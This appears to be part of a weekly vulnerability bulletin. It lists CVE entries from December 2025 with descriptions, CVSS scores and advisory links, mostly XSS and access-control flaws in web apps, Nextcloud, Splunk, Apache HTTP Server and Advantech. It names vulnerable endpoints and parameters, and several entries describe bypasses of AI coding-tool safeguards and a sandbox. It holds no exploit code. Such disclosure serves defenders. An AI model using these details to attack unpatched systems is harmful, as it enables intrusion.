| code-projects--Employee Profile Management System | A vulnerability was identified in code-projects Employee Profile Management System 1.0. This issue affects some unknown processing of the file /view_personnel.php. The manipulation of the argument per_address/dr_school/other_school leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2025-12-07 | 3.5 | CVE-2025-14194 | VDB-334614 | code-projects Employee Profile Management System view_personnel.php cross site scripting VDB-334614 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699246 | code-projects Employee Profile Management System published November 15, 2025 Cross Site Scripting https://github.com/shenxianyuguitian/employee-management-XSS https://code-projects.org/ |
| dayrui--XunRuiCMS | A security vulnerability has been detected in dayrui XunRuiCMS up to 4.7.1. Affected by this issue is some unknown functionality of the file /admind45f74adbd95.php?c=field&m=add&rname=site&rid=1&page=1 of the component Add Data Validation Page. The manipulation of the argument data[name] leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 3.5 | CVE-2025-14006 | VDB-334248 | dayrui XunRuiCMS Add Data Validation admind45f74adbd95.php cross site scripting VDB-334248 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692910 | Sichuan Xunrui Cloud Software Development Co., Ltd xunruicms <=4.7.1 Cross-Site Scripting https://github.com/24-2021/vul/blob/main/xunruicms-Data%20Validation-XSS/xunruicms-Data%20Validation-XSS.md |
| dayrui--XunRuiCMS | A weakness has been identified in dayrui XunRuiCMS up to 4.7.1. Affected by this vulnerability is an unknown functionality of the file /admind45f74adbd95.php?c=field&m=add&rname=site&rid=1&page=0 of the component Add Display Name Field. Executing manipulation of the argument data[name] can lead to cross site scripting. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 2.4 | CVE-2025-14005 | VDB-334247 | dayrui XunRuiCMS Add Display Name Field admind45f74adbd95.php cross site scripting VDB-334247 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692909 | Sichuan Xunrui Cloud Software Development Co., Ltd xunruicms <=4.7.1 Cross-Site Scripting https://github.com/24-2021/vul/blob/main/xunruicms-Basic%20Settings-XSS/xunruicms-Basic%20Settings-XSS.md |
| dayrui--XunRuiCMS | A vulnerability was detected in dayrui XunRuiCMS up to 4.7.1. This affects an unknown part of the file /admin79f2ec220c7e.php?c=api&m=demo&name=mobile of the component Domain Name Binding Page. The manipulation results in cross site scripting. The attack may be performed from remote. A high complexity level is associated with this attack. It is indicated that the exploitability is difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 2 | CVE-2025-14007 | VDB-334249 | dayrui XunRuiCMS Domain Name Binding admin79f2ec220c7e.php cross site scripting VDB-334249 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692914 | Sichuan Xunrui Cloud Software Development Co., Ltd xunruicms <=4.7.1 URL redirection causing remote XSS https://github.com/24-2021/vul/blob/main/xunruicms-site_domain%2Bmobile_demo-URL%20redirection%20causing%20remote%20XSS/xunruicms-site_domain%2Bmobile_demo-URL%20redirection%20causing%20remote%20XSS.md |
| envoyproxy--envoy | Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, when Envoy is configured in TCP proxy mode to handle CONNECT requests, it accepts client data before issuing a 2xx response and forwards that data to the upstream TCP connection. If a forwarding proxy upstream from Envoy then responds with a non-2xx status, this can cause a de-synchronized CONNECT tunnel state. By default Envoy continues to allow early CONNECT data to avoid disrupting existing deployments. The envoy.reloadable_features.reject_early_connect_data runtime flag can be set to reject CONNECT requests that send data before a 2xx response when intermediaries upstream from Envoy may reject establishment of a CONNECT tunnel. | 2025-12-03 | 3.7 | CVE-2025-64763 | https://github.com/envoyproxy/envoy/security/advisories/GHSA-rj35-4m94-77jh |
| Grandstream--GXP1625 | A security flaw has been discovered in Grandstream GXP1625 1.0.7.4. The impacted element is an unknown function of the file /cgi-bin/api.values.post of the component Network Status Page. Performing manipulation of the argument vpn_ip results in basic cross site scripting. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 3.5 | CVE-2025-14186 | VDB-334606 | Grandstream GXP1625 Network Status api.values.post cross site scripting VDB-334606 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698650 | Grandstream GXP1625 1.0.7.4 xss https://drive.google.com/file/d/1rsskCaj4TwiaGG9_VYabjnKMP_zAry7L/view?usp=sharing |
| hedgedoc--hedgedoc | HedgeDoc is an open source, real-time, collaborative, markdown notes application. Prior to 1.10.4, some of HedgeDoc's OAuth2 endpoints for social login providers such as Google, GitHub, GitLab, Facebook or Dropbox lack CSRF protection, since they don't send a state parameter and verify the response using this parameter. This vulnerability is fixed in 1.10.4. | 2025-12-05 | 3.7 | CVE-2025-66629 | https://github.com/hedgedoc/hedgedoc/security/advisories/GHSA-6wm6-3vpq-6qvv https://github.com/hedgedoc/hedgedoc/commit/35f36fccba941ed8029ee222f7d2a5df17b42e2b |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 fail to validate the user's permission when accessing files and subscribing to a block in Boards, which allows an authenticated user to access other boards' files and to subscribe to blocks from boards that the user does not have access to. | 2025-12-02 | 3.1 | CVE-2025-13870 | https://mattermost.com/security-updates |
| Medtronic--CareLink Network | Insecure Direct Object Reference vulnerability in Medtronic CareLink Network which allows an authenticated attacker with access to specific device and user information to submit web requests to an API endpoint that would expose sensitive user information. This issue affects CareLink Network: before December 4, 2025. | 2025-12-04 | 2.2 | CVE-2025-12997 | https://www.medtronic.com/en-us/e/product-security/security-bulletins/carelink-network-vulnerabilities.html |
| n/a--JIZHICMS | A vulnerability was identified in JIZHICMS up to 2.5.5. The impacted element is an unknown function of the file /index.php/admins/Comment/addcomment.html of the component Comment Handler. The manipulation of the argument body leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 2.4 | CVE-2025-14013 | VDB-334254 | JIZHICMS Comment addcomment.html cross site scripting VDB-334254 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #694649 | Langfang Extreme Network Technology Co., Ltd jizhicms <=2.5.5 Storage XSS https://github.com/24-2021/vul2/blob/main/jizhicms%3DV2.5.5-Commentaddcomment.html-bodyparameter-Storage%20XSS/jizhicms%3DV2.5.5-Commentaddcomment.html-bodyparameter-Storage%20XSS.md |
| nextcloud--security-advisories | Nextcloud Mail is the mail app for Nextcloud, a self-hosted productivity platform. Prior to 5.5.3, a stored HTML injection in the Mail app's message list allowed an authenticated user to inject HTML into the email subjects. Javascript was correctly blocked by the content security policy of the Nextcloud Server code. | 2025-12-05 | 3.5 | CVE-2025-66514 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-v394-8gpc-6fv5 https://github.com/nextcloud/mail/pull/11740 https://github.com/nextcloud/mail/commit/c64fcc3b79e0c089b5e1d2e04a07bfa740b2ac09 https://hackerone.com/reports/3357036 |
| nextcloud--security-advisories | Nextcloud Groupfolders provides admin-configured folders shared by everyone in a group or team. Prior to 14.0.11, 15.3.12, 16.0.15, 17.0.14, 18.1.8, 19.1.8, and 20.1.2, a user with read-only permission can restore a file from the trash bin. This vulnerability is fixed in 14.0.11, 15.3.12, 16.0.15, 17.0.14, 18.1.8, 19.1.8, and 20.1.2. | 2025-12-05 | 3.5 | CVE-2025-66545 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-2vrq-fhmf-c49m https://github.com/nextcloud/groupfolders/issues/4041 https://github.com/nextcloud/groupfolders/pull/4076 https://github.com/nextcloud/groupfolders/commit/bbe87ebed8da23e9df4db637a76fbc8d36439d58 |
| nextcloud--security-advisories | Nextcloud Calendar is a calendar app for Nextcloud. Prior to 4.7.19, 5.5.6, and 6.0.1, the calendar app allowed blindly booking appointments by sequential ID without knowing the appointment token. This vulnerability is fixed in 4.7.19, 5.5.6, and 6.0.1. | 2025-12-05 | 3.3 | CVE-2025-66546 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-7x2j-2674-fj95 https://github.com/nextcloud/calendar/pull/7537 https://github.com/nextcloud/calendar/commit/f41650c3681fc4a4130eb883f5c0899c011326b3 https://hackerone.com/reports/3275810 |
| nextcloud--security-advisories | Nextcloud Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. Prior to 1.12.7, 1.14.4, and 1.15.1, a file extension could be spoofed by using RTLO (right-to-left override) characters, tricking users into downloading files with a different extension than the one displayed. This vulnerability is fixed in 1.12.7, 1.14.4, and 1.15.1. | 2025-12-05 | 3.3 | CVE-2025-66548 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-xjvq-xvr7-xpg6 https://github.com/nextcloud/deck/pull/6671 https://github.com/nextcloud/deck/commit/afa95d3c507465b9d31af7c88c69b76711ef185a https://hackerone.com/reports/2326618 |
| nextcloud--security-advisories | Contacts app for Nextcloud easily syncs contacts from various devices with your Nextcloud and allows editing. Prior to 5.5.4, 6.0.6, and 7.2.5, a malicious user was able to modify their organisation and title field to load additional CSS files. Javascript and other options were correctly blocked by the content security policy of the Nextcloud Server code. This vulnerability is fixed in 5.5.4, 6.0.6, and 7.2.5. | 2025-12-05 | 3.5 | CVE-2025-66554 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-9v78-cpfc-v6h2 https://github.com/nextcloud/contacts/pull/4619 https://github.com/nextcloud/contacts/commit/d954d098978dde1f121600e8b994e02f293c68b1 https://hackerone.com/reports/3293290 |
| nextcloud--security-advisories | Nextcloud Talk is a video & audio conferencing app for Nextcloud. Prior to 20.1.8 and 21.1.2, a participant with chat permissions was able to delete poll drafts of other participants within the conversation based on their numeric ID. This vulnerability is fixed in 20.1.8 and 21.1.2. | 2025-12-05 | 3.5 | CVE-2025-66556 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-pr9f-vqgg-m2jh https://github.com/nextcloud/spreed/pull/15532 https://github.com/nextcloud/spreed/commit/bd68e80d1dea98d84c1d621c2c681238cf041725 https://hackerone.com/reports/3247386 |
| nextcloud--security-advisories | Nextcloud Twofactor WebAuthn is the WebAuthn Two-Factor Provider for Nextcloud. Prior to 1.4.2 and 2.4.1, a missing ownership check allowed an attacker to take away a 2FA WebAuthn device when correctly guessing an 80-128 character long random string of letters, numbers and symbols. The victim would then be prompted to register a new device on the next login. The attacker cannot authenticate as the victim. This vulnerability is fixed in 1.4.2 and 2.4.1. | 2025-12-05 | 3.1 | CVE-2025-66558 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-fr8x-mvjg-wf9q https://github.com/nextcloud/twofactor_webauthn/pull/881 https://github.com/nextcloud/twofactor_webauthn/commit/5d2302166d31ee2e01b2e21556bd5372156da13d https://hackerone.com/reports/3360354 |
| nextcloud--security-advisories | The Nextcloud Approval app allows approval or disapproval of files in the sidebar. Prior to 1.3.1 and 2.5.0, an authenticated user listed as a requester in a workflow can set another user's file into the "pending approval" without access to the file by using the numeric file id. This vulnerability is fixed in 1.3.1 and 2.5.0. | 2025-12-05 | 2.7 | CVE-2025-66515 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-q26g-fmjq-x5g5 https://github.com/nextcloud/approval/pull/334 https://github.com/nextcloud/approval/commit/e30b56b7832255311ac800b7875f44866e88fff4 https://hackerone.com/reports/3338748 |
| nextcloud--security-advisories | Nextcloud Desktop is the desktop sync client for Nextcloud. Prior to 3.16.5, when trying to manually lock a file inside an end-to-end encrypted directory, the path of the file was sent to the server unencrypted, making it possible for administrators to see it in log files. This vulnerability is fixed in 3.16.5. | 2025-12-05 | 2.4 | CVE-2025-66549 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-h9xj-qh76-q3hw https://github.com/nextcloud/desktop/pull/8330 https://github.com/nextcloud/desktop/commit/36d6c234d42b06a6f2e9de3e413a5c3c625edad6 https://hackerone.com/reports/3159877 |
| nutzam--NutzBoot | A weakness has been identified in nutzam NutzBoot up to 2.6.0-SNAPSHOT. This affects the function getInputStream of the file nutzcloud/nutzcloud-literpc/src/main/java/org/nutz/boot/starter/literpc/impl/endpoint/http/HttpServletRpcEndpoint.java of the component LiteRpc-Serializer. Executing manipulation can lead to deserialization. The attack may be launched remotely. This attack is characterized by high complexity. The exploitability is reported as difficult. The exploit has been made available to the public and could be exploited. | 2025-12-01 | 3.7 | CVE-2025-13805 | VDB-333815; nutzam NutzBoot LiteRpc-Serializer HttpServletRpcEndpoint.java getInputStream deserialization VDB-333815; CTI Indicators (IOB, IOC, IOA) Submit #692053; Nutz Framework NutzBoot 2.6.0-SNAPSHOT Code Execution (Unauthenticated Java Deserialization) https://github.com/Xzzz111/exps/blob/main/archives/nutzboot-RCE-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/nutzboot-RCE-1/report.md#vulnerability-details-and-poc |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.10, 10.0.2503.8, and 9.3.2411.120, a low-privileged user that does not hold the "admin" or "power" Splunk roles could create a views dashboard with a custom background using the `data:image/png;base64` protocol that could potentially lead to an unvalidated redirect. This behavior circumvents the Splunk external URL warning mechanism by using a specially crafted URL, allowing for a redirection to an external malicious site. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The authenticated user should not be able to exploit the vulnerability at will. | 2025-12-03 | 3.5 | CVE-2025-20382 | https://advisory.splunk.com/advisories/SVD-2025-1201 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.6, 10.0.2503.7, and 9.3.2411.117, a user who holds a role with a high privilege capability `admin_all_objects` could craft a malicious payload through the href attribute of an anchor tag within a collection in the navigation bar, which could result in execution of unauthorized JavaScript code in the browser of a user. | 2025-12-03 | 2.4 | CVE-2025-20385 | https://advisory.splunk.com/advisories/SVD-2025-1204 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.0.1, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.4, 10.0.2503.7, and 9.3.2411.116, a user who holds a role that contains the high privilege capability `change_authentication` could enumerate internal IP addresses and network ports when adding new search peers to a Splunk search head in a distributed environment. | 2025-12-03 | 2.7 | CVE-2025-20388 | https://advisory.splunk.com/advisories/SVD-2025-1207 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a hard-coded cryptographic key vulnerability. The product uses a static HS512 HMAC secret for signing EIRMMToken JWTs across all installations. The server accepts forged JWTs that need only contain a valid email claim, allowing a remote unauthenticated attacker to generate arbitrary tokens and impersonate any DeviceOn account, including the root super admin. Successful exploitation permits full administrative control of the DeviceOn instance and can be leveraged to execute code on managed agents through DeviceOn's remote management features. | 2025-12-05 | not yet calculated | CVE-2025-34256 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-hardcoded-jwt-key-authentication-bypass |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/action/defined endpoint. When an authenticated user creates a task, the defined_name value is stored and later rendered in the Overview page without HTML sanitization. An attacker can inject malicious script into defined_name, which is then executed in the browser context of users who view the affected task, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34257 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-action-defined |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/devicemap/plan endpoint. When an authenticated user adds an area to a map entry, the name parameter is stored and later rendered in the map list without HTML sanitization. An attacker can inject malicious script into the area name, which is then executed in the browser context of users who view or interact with the affected map entry, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34258 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-devicemap-plan |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/devicemap/building endpoint. When an authenticated user creates a map entry, the name parameter is stored and later rendered in the map list UI without HTML sanitization. An attacker can inject malicious script into the map entry name, which is then executed in the browser context of users who view or interact with the affected map entry, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34259 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-devicemap-building |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/action/schedule endpoint. When an authenticated user adds a schedule to an existing task, the schedule name is stored and later rendered in schedule listings without HTML sanitization. An attacker can inject malicious script into the schedule name, which is then executed in the browser context of users who view or interact with the affected schedule, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34260 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-action-schedule |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/devicegroups/ endpoint. When an authenticated user creates a device group, the name and description values are stored and later rendered in device group listings without proper HTML sanitization. An attacker can inject malicious script into either field, which is then executed in the browser context of users who view or interact with the affected device group, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34261 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-devicegroups |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/devices/name/{agent_id} endpoint. When an authenticated user renames a device, the new_name value is stored and later rendered in device listings or detail views without proper HTML sanitization. An attacker can inject malicious script into the device name, which is then executed in the browser context of users who view or interact with the affected device, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34262 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-devices-name-agentid |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/plugin-config/dashboards/menus endpoint. When an authenticated user adds or edits a dashboard entry, the label and path values are stored in plugin configuration data and later rendered in the dashboard UI without proper HTML sanitization. An attacker can inject malicious script into either field, which is then executed in the browser context of users who view or interact with the affected dashboard, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34263 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-pluginconfig-dashboards-menus |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/dog/{agentId} endpoint. When an authenticated user adds or edits Software Watchdog process rules for an agent, the monitored process name is stored in the settings array and later rendered in the Software Watchdog UI without proper HTML sanitization. An attacker can inject malicious script into the process name, which is then executed in the browser context of users who view or interact with the affected rules, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34264 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-dog-agentid |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/rule-engines endpoint. When an authenticated user creates or updates a rule for an agent, the rule fields min, max, and unit are stored and later rendered in rule listings or detail views without proper HTML sanitization. An attacker can inject malicious script into one or more of these fields, which is then executed in the browser context of users who view or interact with the affected rule, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34265 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-rulesengine |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/plugin-config/addins/menus endpoint. When an authenticated user adds or edits an AddIns menu entry, the label and path values are stored in plugin configuration data and later rendered in the AddIns UI without proper HTML sanitization. An attacker can inject malicious script into either field, which is then executed in the browser context of users who view or interact with the affected AddIns entry, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34266 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-pluginconfig-addins-menus |
| AI-QL--tuui | TUUI is a desktop MCP client designed as a tool unitary utility integration. Prior to 1.3.4, a critical Remote Code Execution (RCE) vulnerability exists in Tuui due to an unsafe Cross-Site Scripting (XSS) flaw in the Markdown rendering component. Tuui allows the execution of arbitrary JavaScript within ECharts code blocks. Combined with an exposed IPC interface that allows spawning processes, an attacker can execute arbitrary system commands on the victim's machine simply by having them view a malicious Markdown message. This vulnerability is fixed in 1.3.4. | 2025-12-05 | not yet calculated | CVE-2025-66562 | https://github.com/AI-QL/tuui/security/advisories/GHSA-qjhq-rgmr-6c3g https://github.com/AI-QL/tuui/commit/f673fa5b4d76e8236c7d9506d0727875cfa79cc1 https://github.com/AI-QL/tuui/releases/tag/v1.3.4 |
| airkeyboardapp--AirKeyboard iOS App | AirKeyboard iOS App 1.0.5 contains a missing authentication vulnerability that allows unauthenticated attackers to type arbitrary keystrokes directly into the victim's iOS device in real-time without user interaction, resulting in full remote input control. | 2025-12-04 | not yet calculated | CVE-2025-66555 | Exploit Database Entry 52333 AirKeyboard Homepage Apple App Store Link https://www.vulncheck.com/advisories/airkeyboard-ios-app-105-remote-input-injection |
| AMS Development Corp.--GAMS | Vulnerability in the access control system of the GAMS licensing system that allows unlimited valid licenses to be generated, bypassing any usage restrictions. The validator uses an insecure checksum algorithm; knowing this algorithm and the format of the license lines, an attacker can recalculate the checksum and generate a valid license to grant themselves full privileges without credentials or access to the source code, allowing them unrestricted access to GAMS's mathematical models and commercial solvers. | 2025-12-02 | not yet calculated | CVE-2025-41086 | https://www.incibe.es/en/incibe-cert/notices/aviso/authorization-bypass-gams-gams-development-corp https://www.gams.com/latest/docs/RN_51.html |
| angular--angular | Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 21.0.2, 20.3.15, and 19.2.17, a stored Cross-Site Scripting (XSS) vulnerability existed in the Angular Template Compiler. It occurs because the compiler's internal security schema is incomplete, allowing attackers to bypass Angular's built-in security sanitization. Specifically, the schema fails to classify certain URL-holding attributes (e.g., those that could contain javascript: URLs) as requiring strict URL security, enabling the injection of malicious scripts. This vulnerability is fixed in 21.0.2, 20.3.15, and 19.2.17. | 2025-12-01 | not yet calculated | CVE-2025-66412 | https://github.com/angular/angular/security/advisories/GHSA-v4hv-rgfq-gp49 https://github.com/angular/angular/commit/1c6b0704fb63d051fab8acff84d076abfbc4893a |
| anthropic-experimental--sandbox-runtime | Anthropic Sandbox Runtime is a lightweight sandboxing tool for enforcing filesystem and network restrictions on arbitrary processes at the OS level, without requiring a container. Prior to 0.0.16, due to a bug in sandboxing logic, sandbox-runtime did not properly enforce a network sandbox if the sandbox policy did not configure any allowed domains. This could allow sandboxed code to make network requests outside of the sandbox. A patch for this was released in v0.0.16. | 2025-12-04 | not yet calculated | CVE-2025-66479 | https://github.com/anthropic-experimental/sandbox-runtime/security/advisories/GHSA-9gqj-5w7c-vx47 https://github.com/anthropic-experimental/sandbox-runtime/commit/bea2930cc1db9c73a1b15acf6dc19c5261aec1f3 |
| anthropics--claude-code | Claude Code is an agentic coding tool. Prior to 1.0.93, due to errors in parsing shell commands related to $IFS and short CLI flags, it was possible to bypass the Claude Code read-only validation and trigger arbitrary code execution. Reliably exploiting this requires the ability to add untrusted content into a Claude Code context window. This vulnerability is fixed in 1.0.93. | 2025-12-03 | not yet calculated | CVE-2025-66032 | https://github.com/anthropics/claude-code/security/advisories/GHSA-xq4m-mc3c-vvg3 |
| Apache Software Foundation--Apache bRPC | Uncontrolled recursion in the json2pb component in Apache bRPC (version < 1.15.0) on all platforms allows remote attackers to make the server crash via sending deep recursive json data. Root Cause: The bRPC json2pb component uses rapidjson to parse json data from the network. The rapidjson parser uses a recursive parsing method by default. If the input json has a large depth of recursive structure, the parser function may run into stack overflow. Affected Scenarios: Use bRPC server with protobuf message to serve http+json requests from untrusted network. Or directly use JsonToProtoMessage to convert json from untrusted input. How to Fix: (Choose one of the following options) 1. Upgrade bRPC to version 1.15.0, which fixes this issue. 2. Apply this patch: https://github.com/apache/brpc/pull/3099 Note: No matter which option you choose, you should know that the fix introduces a recursion depth limit with default value 100. It affects these functions: ProtoMessageToJson, ProtoMessageToProtoJson, JsonToProtoMessage, and ProtoJsonToProtoMessage. If your requests contain json or protobuf messages that have a depth exceeding the limit, the request will be failed after applying the fix. You can modify the gflag json2pb_max_recursion_depth to change the limit. | 2025-12-01 | not yet calculated | CVE-2025-59789 | https://lists.apache.org/thread/ozmcsztcpxn61jxod8jo8q46jo0oc1zx |
| Apache Software Foundation--Apache HTTP Server | An integer overflow in the case of failed ACME certificate renewal leads, after a number of failures (~30 days in default configurations), to the backoff timer becoming 0. Attempts to renew the certificate then are repeated without delays until it succeeds. This issue affects Apache HTTP Server: from 2.4.30 before 2.4.66. Users are recommended to upgrade to version 2.4.66, which fixes the issue. | 2025-12-05 | not yet calculated | CVE-2025-55753 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | Apache HTTP Server 2.4.65 and earlier with Server Side Includes (SSI) enabled and mod_cgid (but not mod_cgi) passes the shell-escaped query string to #exec cmd="..." directives. This issue affects Apache HTTP Server before 2.4.66. Users are recommended to upgrade to version 2.4.66, which fixes the issue. | 2025-12-05 | not yet calculated | CVE-2025-58098 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows with AllowEncodedSlashes On and MergeSlashes Off allows an attacker to potentially leak NTLM hashes to a malicious server via SSRF and malicious requests or content. Users are recommended to upgrade to version 2.4.66, which fixes the issue. | 2025-12-05 | not yet calculated | CVE-2025-59775 | https://httpd.apache.org/security/vulnerabilities_24.html |
| Apache Software Foundation--Apache HTTP Server | Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache HTTP Server through environment variables set via the Apache configuration unexpectedly superseding variables calculated by the server for CGI programs. This issue affects Apache HTTP Server from 2.4.0 through 2.4.65. Users are recommended to upgrade to version 2.4.66 which fixes the issue. | 2025-12-05 | not yet calculated | CVE-2025-65082 | https://httpd.apache.org/security/vulnerabilities_24.html |
